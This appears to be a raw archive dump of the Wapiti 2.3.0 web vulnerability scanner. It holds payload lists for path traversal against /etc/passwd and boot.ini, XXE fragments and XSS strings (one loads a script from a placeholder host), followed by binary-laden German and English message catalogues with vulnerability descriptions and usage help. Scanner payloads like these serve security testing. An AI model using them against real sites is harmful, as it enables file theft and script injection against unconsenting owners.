[DIRVALUE]/../../../../../../../../../../../../../../../../../../../../boot.ini\0 /etc/passwd\0index.htm /etc/passwd\0index.html /etc/passwd\0index.php /etc/passwd\0index.asp /etc/passwd\0index.aspx /etc/passwd\0index.css c:\\boot.ini\0index.htm c:\\boot.ini\0index.html c:\\boot.ini\0index.php c:\\boot.ini\0index.asp c:\\boot.ini\0index.aspx c:\\boot.ini\0index.css ../../../../../../../../../../etc/passwd\0index.htm ../../../../../../../../../../etc/passwd\0index.html ../../../../../../../../../../etc/passwd\0index.php ../../../../../../../../../../etc/passwd\0index.asp ../../../../../../../../../../etc/passwd\0index.aspx ../../../../../../../../../../etc/passwd\0index.css ../../../../../../../../../../etc/passwd\0pix.gif ../../../../../../../../../../boot.ini\0index.htm ../../../../../../../../../../boot.ini\0index.html ../../../../../../../../../../boot.ini\0index.php ../../../../../../../../../../boot.ini\0index.asp ../../../../../../../../../../boot.ini\0index.aspx ../../../../../../../../../../boot.ini\0index.css ../../../../../../../../../../boot.ini\0pix.gix ]>&xxe; ]>&xxe; .depdb .depdb\0 pearcmd.php pearcmd.php\0 [FILE_NAME] [FILE_NAME]\0 wapiti-2.3.0+dfsg/wapitiCore/config/attacks/xssPayloads.txt000066400000000000000000000050111240201516300237770ustar00rootroot00000000000000 ipt>alert('__XSS__') ipt>alert('__XSS__')ipt> ipt>alert("__XSS__") ipt>alert("__XSS__")ipt> ipt>String.fromCharCode(0,__XSS__,1) ipt>String.fromCharCode(0,__XSS__,1)ipt> ipt src=http://__XSS__/x.js> ipt src=http://__XSS__/x.js>ipt> wapiti-2.3.0+dfsg/wapitiCore/config/language/000077500000000000000000000000001240201516300210605ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/de/000077500000000000000000000000001240201516300214505ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/de/LC_MESSAGES/000077500000000000000000000000001240201516300232355ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/de/LC_MESSAGES/wapiti.mo000066400000000000000000000555411240201516300251010ustar00rootroot00000000000000$, %     '7IQ`p+b'r %BZi z!  3T r 1/ CQ` -$97K7% 3#C gq!!%@f)/?&]6,#8&S#z"   $ 9Z x< 3POaNOiPhi#0G%*/>%Tz +:9/:i]'%*Pe~")!% < F P ^-k,-&% A Q ;g %!!!!!"!"2"E"\"e"t"""*"""#|*#)##_#A%%&6&K&S'C(X(cg(a*-+L+_+r+A,C,Y,/n,{- 0(0?0\0-y00300 1111O1_1o3.6-/6R]6E6@6)77 a7 n7 x77D7(78868L8R9i9}99L#:/p::::: ;+;E;$^;;(;3;G;8<I<6\<<<"<G<h/=(== =(=>>0>D>> c?0q?@DAA AA$B?B[PBZB\CodCnCpCD6DDN EZEbEgElE{E%EE EE-EF$F@6F>wF@FgF,_G.GGGG9G)3H)]H#HH HrH ?Z MZ/ZZ.Z0Z(Z'[;[K[{w!kA O>U]3[(v^@/X-K=<7fja| 0~s9 +\"$ZBd6'Y.nI qe xh}Dmtr2PS:Rg8%HJQ*o`byTV;L#zu 1E_5lCc?iWM4&),pGNF .htaccess bypass vulnerability: {0} Evil url: {0} coming from {0} * Intputs: * Method: {0} * Selects: * TextAreas: * URLs browsed * URLs to browse Notice(QUERY_STRING)+ attackGET {0}+ attackPOST {0} from {1}.NET SQL InjectionA report has been generated in the file {0}Access-Based SQL InjectionAcess-Based SQL InjectionAnomalies found:Attack process interrupted. To perform again the attack, lauch Wapiti with "-i" or "-k" parameter.BSD local file disclosure vulnerabilityBackup fileBackup file descriptionBackup file solutionBackup file {0} found for {1}Blind SQL InjectionBlind SQL Injection descriptionBlind SQL Injection solutionBlind SQL vulnerabilityCRLF InjectionCRLF descriptionCRLF solutionChoose the form you want to use :Command executionCommands executionCommands execution descriptionCommands execution solutionConnection refused!Cross Site ScriptingCross Site Scripting descriptionCross Site Scripting solutionDB2 InjectionDate of the scan : {0} Downloading from the web...Enter a number : Error downloading Nikto databaseError getting url {0}Error: The server did not understand this requestEvalutation warningEvil request:Evil request: Exception in lswww.browse: {0}File HandlingFile Handling descriptionFile Handling solutionFile disclosure vulnerability in include_pathFile {0} loaded, the scan continues:File {0} loaded. Wapiti will use it to perform the attackFile {0} not found, Wapiti will scan again the web siteFile {0} not found. Wapiti will scan the web site againFirst argument must be the root url !Form {0}FormsForms InfoFound backup file !Found permanent XSS attacked by {0} with fields {1}Found permanent XSS in {0} with {1}From: {0}HtAccess protection found: {0}Htaccess BypassHtaccess bypass descriptionHtaccess bypass solutionInterbase InjectionInternal Server ErrorInternal server error descriptionInternal server error solutionInvalid argument for option {0} : {1}Invalid link argument: {0}Invalid protocol: {0}Involved parameter: {0}Java.SQL InjectionLDAP InjectionLinux local file disclosure vulnerabilityMSSQL-Based InjectionMake sure the url is correct.MySQL InjectionNo forms found in this page !No links or forms found in this page !Open {0}/index.html with a browser to see this report.Oracle InjectionPHP evaluationPlease enter values for the following form: Possible {0} vulnerabilityPostgreSQL InjectionPotentially dangerous filePotentially dangerous file descriptionPotentially dangerous file solutionProblem with local nikto database.Received a HTTP 500 error in {0}References:Remote inclusion vulnerabilityReportReport for {0} Resource consumptionResource consumption descriptionResource consumption solutionSQL InjectionSQL Injection descriptionSQL Injection solutionScan stopped, the data has been savedin the file {0}/{1}.xmlScope of the scan : {0} Source code:Stored XSS vulnerabilitySummary of vulnerabilities :Sybase InjectionThe request timed out while attempting to inject a payload in the parameter {0}The request timed out while attempting to inject a payload in the query stringThe request timed out while attempting to inject a payload in the resource pathThe server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}The server responded with a 500 HTTP error code while attempting to inject a payload in the query stringThe server responded with a 500 HTTP error code while attempting to inject a payload in the resource pathThis scan has been saved in the file {0}/{1}.xmlTimeout occured in {0}To continue this scan, you should launch Wapiti with the "-i" parameterTo: {0}URLSURLsUpload ScriptsUpload scripts found:Wapiti-2.3.0 (wapiti.sourceforge.net)Warning assertWarning execWarning usort()Windows local file disclosure vulnerabilityXPath InjectionXSS vulnerabilityXSS vulnerability found via injection in the parameter {0}XSS vulnerability found via injection in the query stringXSS vulnerability found via injection in the resource pathYou can use it to perform attacks without scanning again the web site with the "-k" parameter[!] Missing dependecies for module {0}:[!] Unable to find a module named {0}[*] Loading modules:[+] Launching module {0}cURL command PoC : "{0}"error: timeout while attacking {0}error: {0} while attacking {1}highlight_file() vulnerability in basedirinclude() of file in include_pathpreg_replace injectionurl = {0}wapitiDoc{0} : {1:>3} {0} HtAccess{0} in {1} via injection in the parameter {2}{0} in {1} via injection in the query string{0} in {1} via injection in the resource path{0} via injection in the parameter {1}{0} via injection in the query string|HTTP Code: {0}|HTTP Code: {0} : {1}Project-Id-Version: Wapiti SVN Report-Msgid-Bugs-To: POT-Creation-Date: 2013-08-25 17:33+0200 PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE Last-Translator: FULL NAME Language-Team: LANGUAGE Language: MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit .htaccess bypass-Schwachstelle: {0} Böse URL: {0} von {0} kommend * Eingabefelder: * Methode: {0} * Auswahlfelder: * Textbereiche: * URLs durchsucht * URLs zu durchsuchen Hinweis(QUERY_STRING)+ attackGET {0}+ attackPOST {0} von {1}.NET SQL InjektionEin Bericht wurde in der Datei {0} erzeugtAccess-basierte SQL-InjektionAcess-basierte SQL InjektionAnomalien gefunden:Angriffsprozess wurde unterbrochen. Um den Angriff neu zu starten, führen Sie Wapiti mit den "-i" oder "-k" Parametern aus.BSD lokale Datei-Disclosure SchwachstelleSicherungsdateiEs könnte möglich sein, Sicherungsdateien von Skripten auf dem Webserver zu finden, die der Webadmin dort abgelegt hat um eine ältere Version zu speichern oder es könnten automatisch erzeugte Sicherungsdateien der Editor-Software sein (zum Beispiel Emacs). Diese Kopien könnten interessante Informationen wie Quellcode oder Zugangsdaten enthaltenDer Webadmin muss die Sicherungsdateien manuell vom Server löschen oder sie aus dem Wurzelverzeichnis entfernen. Er sollte auch seinen Editor neu konfigurieren, um automatische Sicherungen zu deaktivieren.Sicherungsdatei {0} gefunden für {1}Blinde SQL InjektionBlinde SQL-Injection ist eine Technik, die eine Schwachstelle ausnutzt, die in der Datenbank einer Anwendung auftritt. Diese Art von Schwachstelle ist schwerer zu erkennen als einfache SQL-Inkektionen weil keine Fehlermeldungen auf der Webseite ausgegeben werden.Um sich gegen SQL-Injektion zu schützen, sollten Nutzereingaben nicht direkt in SQL-Abfragen eingebettet werden. Stattdessen sollten Nutzereingaben 'escaped' oder gefiltert werden oder es sollten parametrisierte Abfragen verwendet werden.Blinde SQL-InjektionCRLF-InjektionDer Begriff CRLF verweist auf den 'Carriage Return' (ASCII 13, \r) 'Line Feed' (ASCII 10, \n). Es wird genutzt um das Zeilende festzulegen, allerdings wird damit in heutigen häufig genutzten Betriebssystemen unterschiedlich umgegangen. Zum Beispiel: In Windows werden sowohl CR als auch LF benötigt, um ein Zeilenende festzulegen, wohingegen unter Linux/ UNIX nur ein LF benötigt wird. Diese Kombination aus CR und LF wird zum Beispiel benutzt wenn man 'Enter' auf der Tastatur drückt. Abhängig von der genutzten Anwendung weist 'Enter' diese an, eine neue Zeile zu beginnen oder um einen Befehl zu senden.Prüfen Sie die angegebenen Parameter verhindern Sie die Injektion von CRLF, indem Sie es filternWählen Sie ein Formular aus :BefehlsausführungBefehlsausführungDieser Angriff besteht darin, auf dem Server Befehle auszuführen. Der Angreifer versucht, diese Befehle in die Anfrageparameter zu injizierenBei Dateisystemaufrufen vorzugsweise ohne Nutzereingaben arbeitenVerbindung abgelehnt!Cross-Site ScriptingCross-Site-Scripting (XSS) ist eine Art von Schwachstelle, die häufig in Webanwendungen gefunden wird, die es erlauben, dass Code von bösartigen Nutzern in Webseiten, die von anderen Nutzern eingesehen werden können, injiziert wird. Beispiele solcher Codes sind HTML-Codes und clientseitige Skripte.Die Beste Art, eine Webanwendung vor XSS-Attacken zu schützen ist sicherzustellen, dass die Anwendung eine Validierung aller Header, Cookies, Query-Strings, Formularfelder und versteckter Felder durchführt. Das Kodieren von Nutzereingaben auf dem Server kann auch XSS-Schwachstellen besiegen, indem man verhindert, dass in Formularen ausführbare Skripte eingefügt werden können. Anwendungen können einen signifikanten Schutz vor JavaScript-basierten Angriffen erlangen, indem sie die folgenden Zeichen in der gesamten Ausgabe durch die entsprechenden HTML-Entities umwandeln: <, >, &, ", ', (, ), #, %, ; , +, -.DB2 InjektionDatum des Scans : {0} Lade aus dem Web herunter...Geben Sie eine Nummer ein : Fehler beim Herunterladen der Nikto-DatenbankFehler beim Abruf der URL {0}Fehler: Der Server hat die Anfrage nicht verstandenEvaluations-WarnungBöse Anfrage:Bösartige Anfrage: Ausnahme in lswww.browse: {0}DateihandhabungDieser Angriff ist auch bekannt als 'Path Traversal' oder 'Directory Traversal', sein Ziel ist es, den Zugriff zu Dateien und Verzeichnissen, die außerhalb des Webroots liegen, zu erlangen. Der Angreifer versucht, die Verzeichnisse auf dem Webserver zu erkunden. Der Angreifer benutzt dabei einige Techniken, zum Beispiel die Manipulation der Variablen die auf Dateien verweisen mit Sequenzen von 'Punkt-Punkt-Slash (../)' und deren Variationen, um zum Wurzelverzeichnis zu wechseln und so durch das Dateisystem zu navigieren.Ziehen Sie es vor, ohne Nutzereingaben zu arbeiten, wenn Sie Systemaufrufe verwenden. Nutzen Sie besser tatsächliche Dateinamen in Templates oder Sprachdateien (z.B.: Der Wert 5 aus der Nutzereingabe = Tschechisch, anstatt zu erwarten, dass der Nutzer 'Tschechisch' übergibt). Stellen Sie sicher, dass Nutzer nicht alle Teile eines Dateipfades übergeben können - stellen Sie Ihren Pfad selbst voran. Validieren Sie Nutzereingaben, indem Sie nur gute Eingaben akzeptieren - verbessern Sie die Eingaben nicht. Nutzen Sie durch chroot geschützte Bereiche und Codezugangsrichtlinien, um einzuschränken, wo Dateien gelesen oder gespeichert werden können.Datei-Disclosure Schwachstelle im include_pathDatei {0} geladen, der Scan wird fortgesetzt:Datei {0} geladen. Wapiti wird sie nutzen, um den nächsten Angriff durchzuführenDatei {0} nicht gefunden, Wapiti wird die Website noch einmal scannenDatei {0} nicht gefunden. Wapiti wird die Website erneut scannenErster Parameter muss die root-URL sein !Formular {0}FormulareFormular-InfoSicherungsdatei gefunden !Persistentes XSS gefunden, angegriffen durch {0} mit den Feldern {1}Persistentes XSS gefunden in {0} mit {1}Von: {0}HtAccess Schutz gefunden: {0}Htaccess Überwindunghtaccess-Dateien werden genutzt um Zugriffe auf einige Dateien über HTTP einzuschränken. In einigen Fällen kann es möglich sein, diese Einschränkungen zu umgehen und auf diese Dateien zuzugreifen.Stellen Sie sicher, dass bei falschen Zugangsdaten jede HTTP-Methode verboten ist.Interbase InjektionInterner Server FehlerEin Fehler der es verhindert die Anfrage zu verarbeiten ist auf der Serverseite aufgetreten. Es könnte das Anzeichen einer Schwachstelle seinWeitere Informationen über den Fehler sollten Sie in den Serverlogs finden.Ungültiger Parameter für die Option {0} : {1}Ungültiger Link-Parameter: {0}Ungültiges Protokoll: {0}Betreffender Parameter: {0}Java.SQL InjektionLDAP InjektionLinux lokale Datei-Disclosure SchwachstelleMSSQL-basierte InjektionPrüfen Sie, ob die URL korrekt ist.MySQL InjektionKeine Formulare auf der Seite gefunden !Keine Links oder Formulare auf der Seite gefunden !Öffnen Sie {0}/index.html in einem Browser um diesen Bericht zu sehen.Oracle InjektionPHP-InterpretationBitte geben Sie Werte für das folgende Formular ein: Mögliche {0} SchwachstellePostgreSQL InjektionMöglicherweise gefährliche DateiEine Datei mit möglichen Schwachstellen wurde auf der Website gefundenStellen Sie sicher, dass das Skript auf dem neuesten Stand ist und schränken Sie den Zugriff darauf einProblem mit der lokalen nikto-Datenbank.HTTP Fehler 500 erhalten in {0}Referenzen:Entfernte Datei-Inklusions-SchwachstelleBerichtBericht für {0} RessourcenverbrauchDer Server brauchte eine ungewöhnlich lange Zeit, um die Anfrage zu verarbeiten. Ein Angreifer könnte diese Schwachstelle nutzen um den Server zu überladenDas betreffende Skript könnte Serverressourcen (CPU, Arbeitsspeicher, Netzwerk, Dateizugriff...) auf ineffiziente Weise nutzenSQL InjektionSQL-Injektions-Schwachstellen erlauben einem Angreifer, die Abfragen die in der Datenbank ausgeführt werden, zu verändern. Ein Angreifer könnte dann in der Lage sein, Informationen die in der Datenbank gespeichert sind auszulesen, zu verändern oder sogar seine Priviligien auf dem System zu erhöhen.Um sich gegen SQL-Injektion zu schützen, sollten Nutzereingaben nicht direkt in SQL-Abfragen eingebettet werden. Stattdessen sollten Nutzereingaben 'escaped' oder gefiltert werden oder es sollten parametrisierte Abfragen genutzt werden.Scan gestoppt, die Daten wurden in der Datei {0}/{1}.xml gespeichertSuchmuster des Scans : {0} Quellcode:Persistente XSS-SchwachstelleZusammenfassung der Schwachstellen :Sybase InjektionZeitüberschreitung der Anfrage beim Versuch ein Payload in den Parameter {0} zu injizierenZeitüberschreitung der Anfrage beim Versuch ein Payload in den Query-String zu injizierenZeitüberschreitung der Anfrage beim Versuch ein Payload in den Ressourcenpfad zu injizierenDer Server antwortete mit einem HTTP-Fehlercode 500 beim Versuch ein Payload in den Parameter {0} zu injizierenDer Server antwortete mit einem HTTP-Fehlercode 500 beim Versuch ein Payload in den Query-String zu injizierenDer Server antwortete mit einem HTTP-Fehlercode 500 beim Versuch ein Payload in den Ressourcenpfad zu injizierenDieser Scan wurde in der Datei {0}/{1}.xml gespeichertZeitlimit überschritten in {0}Um diesen Scan fortzusetzen, sollten Sie Wapiti mit dem "-i" Parameter startenAn: {0}URLSURLsUpload-SkripteUpload-Skripte gefunden:Wapiti-2.3.0 (wapiti.sourceforge.net)Assert-WarnungWarnung execusort()-WarnungWindows lokale Datei-Disclosure SchwachstelleXPath InjektionXSS-SchwachstelleXSS -Schwachstelle gefunden durch Injektion in den Parameter {0}XSS-Schwachstelle gefunden durch Injektion in den Query-StringXSS-Schwachstelle gefunden durch Injektion in den RessourcenpfadSie können es nutzen, um Angriffe ohne erneuten Scan der Website mit dem "-k" Parameter durchzuführen[!] Fehlende Abhängigkeiten für Modul {0}:[!] Konnte kein Modul mit dem Namen {0} finden[*] Lade Module:[+] Starte Modul {0}cURL Befehl PoC : "{0}"Fehler: Zeitüberschreitung während des Angriffs auf {0}Fehler: {0} während des Angriffs auf {1}highlight_file() Schwachstelle im basedirinclude() von Datei im include_pathpreg_replace-InjektionURL = {0}Wapiti-2.3.0 - Sicherheitsscanner für Webanwendungen Befehlszeile: python wapiti.py http://server.com/base/url/ [Optionen] Unterstützte Optionen sind: -s --start Um eine URL anzugeben, von der begonnen werden soll. Diese Option kann mehrfach verwendet werden. Wapiti wird diese Links nach weiteren URLs durchsuchen, auch wenn der angegebene Link nicht dem Suchmuster entspricht. -x --exclude Um eine URL vom Scan auszulassen (z.B. Logout-URLs). Diese Option kann für verschiedene URLs mehrfach verwendet werden. Platzhalter (*) können in der URL für einfache reguläre Ausdrücke verwendet werden. Beispiel : -x http://server/base/?page=*&module=test or -x http://server/base/admin/* um ein Verzeichnis auszulassen. -p --proxy Um einen Proxy anzugeben. Zur Zeit werden HTTP- und HTTPS-Proxys unterstützt. Diese Option kann mehrfach verwendet werden, um HTTP- und HTTPS-Proxys anzugeben. Beispiel: -p http://proxy:port/ -c --cookie Um Cookies für den Scan zu importieren. Die Cookie-Datei muss im JSON-Format sein. Cookies können mit Hilfe der Werkzeuge cookie.py und getcookie.py (net-Verzeichnis) aufgezeichnet werden. -t --timeout Um ein Zeitlimit zu setzen (Maximalzeit in Sekunden, die auf eine Serverantwort gewartet werden soll). -a --auth Zugangsdaten für HTTP-Authentifizierung setzen. --auth-method Wenn der Server eine Authentifizierung erfordert, kann so die Authentifizierungsmethode gesetzt werden. Zur Zeit unterstützte Methoden sind (einige erfordern die Installation von Zusatzmodulen): + basic + digest + kerberos + ntlm -r --remove Einen Parameter (Name und Wert) von URLs entfernen. -n --nice Eine Maximale Anzahl von URLs mit dem gleichen Suchmuster festlegen (z.B. die maximale Anzahl einzigartiger Werte für einen Parameter). Benutzen Sie diese Option, um Endlosschleifen während des Scans zu verhindern. Das Limit muss größer als 0 sein. -m --module Module (und HTTP-Methoden für jedes Modul) für die Angriffe festlegen. Einem Modul kann ein Bindestrich vorangestellt werden, um es zu deaktivieren. Um das Ziel nur zu durchsuchen (ohne Payloads zu senden), deaktivieren Sie jedes Modul mit -m "-all". Ohne Festlegung von HTTP-Methoden werden GET und POST verwendet. Beispiel: -m "-all,xss:get,exec:post" -u --color Farben benutzen, um Verwundbarkeiten und Anomalien in der Ausgabe zu markieren. -v --verbose Protokollierungstiefe festlegen. 0: Leise (Standard), 1: Jede URL ausgeben, 2: Jeden Angriff ausgeben. -b --scope Suchmuster festlegen: + page: um eine Seite zur analysieren, die als root-URL festgelegt wurde. + folder: um alle URLs unterhalb der root-URL, die an Wapiti übergeben wurde, zu analysieren. (Standard). + domain: um alle Links zu den Seiten zu analysieren, die innerhalb der gleichen Domain sind wie die URL, die an Wapiti übergeben wurde. -f --format Format für den Bericht festlegen. json: Report im JSON-Format html: Report im HTML-Format (Standard) openvas: Report im OpenVAS XML-Format txt: Report im Klartext (UTF-8) vulneranet: Report im VulneraNET-Format (XML basiert) xml: Report im XML-Format -o --output Den Dateinamen des Berichts festlegen. Wenn der Bericht im Format 'html' ist, wird dieser Parameter als Verzeichnisname benutzt. -i --continue Dieser Parameter weist Wapiti an, den letzten Scan der in der XML-Statusdatei gespeichert wurde, fortzusetzen. Der Dateiname ist optional, falls nicht festgelegt, wird Wapiti die Standard- Datei aus dem "scans"-Verzeichnis nutzen. -k --attack Dieser Parameter weist Wapiti an, die Angriffe fortzusetzen ohne die Website erneut zu scannen, indem es den Status aus der festgelegten Datei lädt. Der Dateiname ist optional, falls nicht festgelegt, wird Wapiti die Standard- Datei aus dem "scans"-Verzeichnis nutzen. --verify-ssl <0|1> Dieser Parameter zeigt an, ob Wapiti SSL-Zertifikate überprüfen soll. Standardmäßig werden diese überprüft -h --help Um diese Dokumentation anzuzeigen {0} : {1:>3} {0} HtAccess{0} in {1} durch Injektion in den Parameter {2}{0} in {1} durch Injektion in den Query-String{0} in {1} durch Injektion in den Ressourcenpfad{0} durch Injektion in den Parameter {1}{0} durch Injektion in den Query-String|HTTP Code: {0}|HTTP Code: {0} : {1}wapiti-2.3.0+dfsg/wapitiCore/config/language/en/000077500000000000000000000000001240201516300214625ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/en/LC_MESSAGES/000077500000000000000000000000001240201516300232475ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/en/LC_MESSAGES/wapiti.mo000066400000000000000000000521051240201516300251040ustar00rootroot00000000000000$, %     '7IQ`p+b'r %BZi z!  3T r 1/ CQ` -$97K7% 3#C gq!!%@f)/?&]6,#8&S#z"   $ 9Z x< 3POaNOiPhi#0G%*/>%Tz +:9/:i]'%*Pe~")!% < F P ^-k,-&% A Q ;g %!!! !! " " "0"B"J"Y"i""+""""c#'l# #1#$l%%%&H'`'&o'U)!)* *3*>** +!+H*, s.... ..1.0/ C/Q/`/ //"I1-l3$39373714%i444 4434#4 55>5N5D5-6A6sW6D6%767Q7g777)77778&-86T888,8889D#9Hh9"9 9 9: :':7:L:u: H;V;B<=<8= Q=^=w==O=N=OD>i>h>ig?0?@G@a@i@n@s@@%@@ @@+@A&A:8A9sA:A]A'FB%nBBBB"BB)C!GCiC CC .S U]3[(v^@/X-K=<7fja| 0~s9 +\"$ZBd6'Y.nI qe xh}Dmtr2PS:Rg8%HJQ*o`byTV;L#zu 1E_5lCc?iWM4&),pGNF .htaccess bypass vulnerability: {0} Evil url: {0} coming from {0} * Intputs: * Method: {0} * Selects: * TextAreas: * URLs browsed * URLs to browse Notice(QUERY_STRING)+ attackGET {0}+ attackPOST {0} from {1}.NET SQL InjectionA report has been generated in the file {0}Access-Based SQL InjectionAcess-Based SQL InjectionAnomalies found:Attack process interrupted. To perform again the attack, lauch Wapiti with "-i" or "-k" parameter.BSD local file disclosure vulnerabilityBackup fileBackup file descriptionBackup file solutionBackup file {0} found for {1}Blind SQL InjectionBlind SQL Injection descriptionBlind SQL Injection solutionBlind SQL vulnerabilityCRLF InjectionCRLF descriptionCRLF solutionChoose the form you want to use :Command executionCommands executionCommands execution descriptionCommands execution solutionConnection refused!Cross Site ScriptingCross Site Scripting descriptionCross Site Scripting solutionDB2 InjectionDate of the scan : {0} Downloading from the web...Enter a number : Error downloading Nikto databaseError getting url {0}Error: The server did not understand this requestEvalutation warningEvil request:Evil request: Exception in lswww.browse: {0}File HandlingFile Handling descriptionFile Handling solutionFile disclosure vulnerability in include_pathFile {0} loaded, the scan continues:File {0} loaded. Wapiti will use it to perform the attackFile {0} not found, Wapiti will scan again the web siteFile {0} not found. Wapiti will scan the web site againFirst argument must be the root url !Form {0}FormsForms InfoFound backup file !Found permanent XSS attacked by {0} with fields {1}Found permanent XSS in {0} with {1}From: {0}HtAccess protection found: {0}Htaccess BypassHtaccess bypass descriptionHtaccess bypass solutionInterbase InjectionInternal Server ErrorInternal server error descriptionInternal server error solutionInvalid argument for option {0} : {1}Invalid link argument: {0}Invalid protocol: {0}Involved parameter: {0}Java.SQL InjectionLDAP InjectionLinux local file disclosure vulnerabilityMSSQL-Based InjectionMake sure the url is correct.MySQL InjectionNo forms found in this page !No links or forms found in this page !Open {0}/index.html with a browser to see this report.Oracle InjectionPHP evaluationPlease enter values for the following form: Possible {0} vulnerabilityPostgreSQL InjectionPotentially dangerous filePotentially dangerous file descriptionPotentially dangerous file solutionProblem with local nikto database.Received a HTTP 500 error in {0}References:Remote inclusion vulnerabilityReportReport for {0} Resource consumptionResource consumption descriptionResource consumption solutionSQL InjectionSQL Injection descriptionSQL Injection solutionScan stopped, the data has been savedin the file {0}/{1}.xmlScope of the scan : {0} Source code:Stored XSS vulnerabilitySummary of vulnerabilities :Sybase InjectionThe request timed out while attempting to inject a payload in the parameter {0}The request timed out while attempting to inject a payload in the query stringThe request timed out while attempting to inject a payload in the resource pathThe server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}The server responded with a 500 HTTP error code while attempting to inject a payload in the query stringThe server responded with a 500 HTTP error code while attempting to inject a payload in the resource pathThis scan has been saved in the file {0}/{1}.xmlTimeout occured in {0}To continue this scan, you should launch Wapiti with the "-i" parameterTo: {0}URLSURLsUpload ScriptsUpload scripts found:Wapiti-2.3.0 (wapiti.sourceforge.net)Warning assertWarning execWarning usort()Windows local file disclosure vulnerabilityXPath InjectionXSS vulnerabilityXSS vulnerability found via injection in the parameter {0}XSS vulnerability found via injection in the query stringXSS vulnerability found via injection in the resource pathYou can use it to perform attacks without scanning again the web site with the "-k" parameter[!] Missing dependecies for module {0}:[!] Unable to find a module named {0}[*] Loading modules:[+] Launching module {0}cURL command PoC : "{0}"error: timeout while attacking {0}error: {0} while attacking {1}highlight_file() vulnerability in basedirinclude() of file in include_pathpreg_replace injectionurl = {0}wapitiDoc{0} : {1:>3} {0} HtAccess{0} in {1} via injection in the parameter {2}{0} in {1} via injection in the query string{0} in {1} via injection in the resource path{0} via injection in the parameter {1}{0} via injection in the query string|HTTP Code: {0}|HTTP Code: {0} : {1}Project-Id-Version: Wapiti SVN Report-Msgid-Bugs-To: POT-Creation-Date: 2013-08-25 17:33+0200 PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE Last-Translator: FULL NAME Language-Team: LANGUAGE Language: MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit .htaccess bypass vulnerability: {0} Evil url: {0} coming from {0} * Inputs: * Method: {0} * Selects: * TextAreas: * URLs browsed * URLs to browse Notice(QUERY_STRING)+ attackGET {0}+ attackPOST {0} from {1}.NET SQL InjectionA report has been generated in the file {0}Access-Based SQL InjectionAcess-Based SQL InjectionAnomalies found:Attack process interrupted. To perform again the attack, launch Wapiti with "-i" or "-k" parameter.BSD local file disclosure vulnerabilityBackup fileIt may be possible to find backup files of scripts on the webserver that the web-admin put here to save a previous version or backup files that are automaticallygenerated by the software editor used (like for example Emacs). These copies may reveal interesting informations like source code or credentialsThe webadmin must manually delete the backup files or remove it from the web root. He should also reconfigure its editor to deactivate automatic backups.Backup file {0} found for {1}Blind SQL InjectionBlind SQL injection is a technique that exploits a vulnerability occurring in the database of an application. This kind of vulnerability is harder to detect than basic SQL injections because no error message will be displayed on the webpage.To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, user input must be escaped or filtered or parameterized statements must be used.Blind SQL vulnerabilityCRLF InjectionThe term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today's popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. This combination of CR and LR is used for example when pressing 'Enter' on the keyboard. Depending on the application being used, pressing 'Enter' generally instructs the application to start a new line, or to send a command.Check the submitted parameters and do not allow CRLF to be injected by filtering CRLFChoose the form you want to use :Command executionCommands executionThis attack consists in executing system commands on the server. The attacker tries to inject this commands in the request parametersPrefer working without user input when using file system callsConnection refused!Cross Site ScriptingCross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts.The best way to protect a web application from XSS attacks is ensure that the application performs validation of all headers, cookies, query strings, form fields, and hidden fields. Encoding user supplied output in the server side can also defeat XSS vulnerabilities by preventing inserted scripts from being transmitted to users in an executable form. Applications can gain significant protection from javascript based attacks by converting the following characters in all generated output to the appropriate HTML entity encoding: <, >, &, ", ', (, ), #, %, ; , +, -.DB2 InjectionDate of the scan : {0} Downloading from the web...Enter a number : Error downloading Nikto databaseError getting url {0}Error: The server did not understand this requestEvaluation warningEvil request:Evil request: Exception in lswww.browse: {0}File HandlingThis attack is also known as Path or Directory Traversal, its aim is the access to files and directories that are stored outside the web root folder. The attacker tries to explore the directories stored in the web server. The attacker uses some techniques, for instance, the manipulation of variables that reference files with 'dot-dot-slash (../)' sequences and its variations to move up to root directory to navigate through the file system.Prefer working without user input when using file system calls. Use indexes rather than actual portions of file names when templating or using language files (eg: value 5 from the user submission = Czechoslovakian, rather than expecting the user to return 'Czechoslovakian'). Ensure the user cannot supply all parts of the path - surround it with your path code. Validate the user's input by only accepting known good - do not sanitize the data. Use chrooted jails and code access policies to restrict where the files can be obtained or saved to.File disclosure vulnerability in include_pathFile {0} loaded, the scan continues:File {0} loaded. Wapiti will use it to perform the attackFile {0} not found, Wapiti will scan again the web siteFile {0} not found. Wapiti will scan the web site againFirst argument must be the root url !Form {0}FormsForms InfoFound backup file !Found permanent XSS attacked by {0} with fields {1}Found permanent XSS in {0} with {1}From: {0}HtAccess protection found: {0}Htaccess Bypasshtaccess files are used to restrict access to some files or HTTP method. In some case it may be possible to bypass this restriction and access the files.Make sure every HTTP method is forbidden if the credentials are bad.Interbase InjectionInternal Server ErrorAn error occured on the server's side, preventing it to process the request. It may be the sign of a vulnerability.More information about the error should be found in the server logs.Invalid argument for option {0} : {1}Invalid link argument: {0}Invalid protocol: {0}Involved parameter: {0}Java.SQL InjectionLDAP InjectionLinux local file disclosure vulnerabilityMSSQL-Based InjectionMake sure the url is correct.MySQL InjectionNo forms found in this page !No links or forms found in this page !Open {0}/index.html with a browser to see this report.Oracle InjectionPHP evaluationPlease enter values for the following form: Possible {0} vulnerabilityPostgreSQL InjectionPotentially dangerous fileA file with potential vulnerabilities has been found on the website.Make sure the script is up-to-date and restrict access to it if possibleProblem with local nikto database.Received a HTTP 500 error in {0}References:Remote inclusion vulnerabilityReportReport for {0} Resource consumptionIt took an abnormal time to the server to 